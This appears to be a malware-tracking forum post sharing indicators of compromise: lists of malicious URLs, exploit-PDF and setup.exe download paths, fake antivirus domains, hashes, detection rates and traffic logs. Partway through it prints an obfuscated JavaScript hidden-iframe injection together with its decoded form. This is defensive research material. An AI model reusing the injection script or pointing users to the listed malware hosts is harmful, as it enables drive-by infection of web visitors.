0 Members and 1 Guest are viewing this topic.
hxxp://tds4self.com/sutra/in.cgi?3
hxxp://webcom-software.net/links/?hxxp://monkey-squad.net/monkey/index.phphxxp://monkey-squad.net/monkey/spl/pdf.pdfhxxp://bronotak.cn/phpmyadmin/index.php?hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
hxxp://monkey-squad.net/monkey/exe.phphxxp://qwu11a.biz/cpanel/exe.php
carpena.co.uk/cmweb/print/pdf.php
86.108.36.203/setup.exe99.50.245.81/setup.exe
freak-vkontakte.biz
http://basesrv3.net/bin/in.php
99.149.173.147/setup.exe
way4scan.info
truepornmovies.com/scan/?id=259truepornupload.com/codec.exe
75.10.117.174/setup.exe
wc-zone.biz/root.exe
lesbian-girlhard.com/ftp.exe
siski-piski.biz/tarif/pin.exe
fp3s.biz/6007.exe
antivirus.vc/pictures/forum/ftp1.exe
http://cutheatergroup.cn/fl/index.php
http://cutheatergroup.cn/fl/cache/readme.pdf
http://cutheatergroup.cn/fl/load.php?id=4http://cutheatergroup.cn/fl/load.php?id=5
hxxp://rhianna.name/vidd/
hxxp://tubecollection2009.com/xxplay.php?id=40009
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gifhxxp://pictureswall.com/werber/109/216.jpg
216.240.157.91:80 - [imagesrepository.com] POST /resolution.php88.214.205.8:80 - [zone-searching.com] POST /borders.php
216.240.157.88:80 - [last-visit.com] GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
Trojan:Code: [Select]hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal - 10/40 (25%)AnubisThreatExpert
hxxp://xxx-softwares.com/softwarefortubeview.40009.exehxxp://cool-softtech.com/softwarefortubeview.40009.exehxxp://rtfm-softweares.com/softwarefortubeview.40009.exehxxp://xyu-softportal.com/softwarefortubeview.40009.exehxxp://xepace-software.com/softwarefortubeview.40009.exehxxp://ce-softwares.com/softwarefortubeview.40009.exehxxp://dig-softportals.com/softwarefortubeview.40009.exehxxp://pac-softportal.com/softwarefortubeview.40009.exe
File size: 65536 bytes MD5...: b179b7959a87bd316d7f7f11a993e037
hxxp://xxx-softwares.com/promo.exehxxp://cool-softtech.com/promo.exehxxp://rtfm-softweares.com/promo.exehxxp://xyu-softportal.com/promo.exehxxp://xepace-software.com/promo.exehxxp://ce-softwares.com/promo.exehxxp://dig-softportals.com/promo.exehxxp://pac-softportal.com/promo.exe
File size: 74752 bytes MD5: 951f3ee90eb3576325fa1920e3da678c
216.240.148.9:80 - dfdsfdsfcdsc.comRequest: GET /bbb.phpRequest: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513
hxxp://dastrealworld.ru/denunreal.html
<script>document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));</script><script>eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));
hxxp://dastrealworld.ru/underworld.htmlhxxp://dastrealworld.ru/cover.html
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
hxxp://totalweightlosscenter.com/images/go.php?sid=1hxxp://nikolaevere.com/images/data/load.php
hxxp://www.mediapartner.by.ru/bunners/banunicom.gifhttp://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bbResult: 7/40 (17.5%)
hxxp://update.dom11z.cn/cache/readme.pdfhttp://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e
hxxp://hostyapics.com/video/988/install_flash_player.exehttp://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8bResult: 4/40 (10%)http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html---->hxxp://members.chello.pl/i.lemecha/index1.gifhttp://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697Result: 4/39 (10.26%)http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html--->(Anubis results in short...i've commented only the ones that have a somewhat lousy detection rate):hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.phphxxp://adimsceibh.com/progs/eqkxyll/bueesf.phphxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.phphxxp://adimsceibh.com/progs/eqkxyll/fczzm.phphxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.phphxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinchhxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
nicdaheb.cn/nuc/spl/pdf.pdf
sehmadac.cn/nuc/spl/pdf.pdf
vavgurac.cn/nuc/spl/pdf.pdf
tixleloc.cn/nuc/spl/pdf.pdf
teyrebuf.cn/nuc/spl/pdf.pdf
tukhemaj.cn/nuc/spl/pdf.pdf
tixwagoq.cn/nuc/spl/pdf.pdf
nicdaheb.cn/nuc/exe.php
antivguardian.comantiawarepro.comantivirprof.com
stats.swpstats.com/getfile?id=26
free-webscaners.com/scan
64.4.224.45/setup.exe69.154.143.170/setup.exe75.54.183.125/setup.exe62.98.53.173/setup.exe74.216.59.250/setup.exe
http://down.yyduowan.net/2.exe
svarkon.ru/update.exe
http://72.29.67.139/knb/megatrader-2k_20090505.exehttp://vilko.biz/opi/index.phphttp://vilko.biz/opi/load.phphttp://vilko.biz/opi/cache/readme.pdfhttp://vilko.biz/myy/index.phphttp://vilko.biz/myy/load.phphttp://vilko.biz/myy/cache/readme.pdf
liteautobestguide.cn/index.php
liteautobestguide.cn/load.php
65.75.82.150/setup.exe98.203.149.224/setup.exe
qqcfwaigua.com/cfwg.exe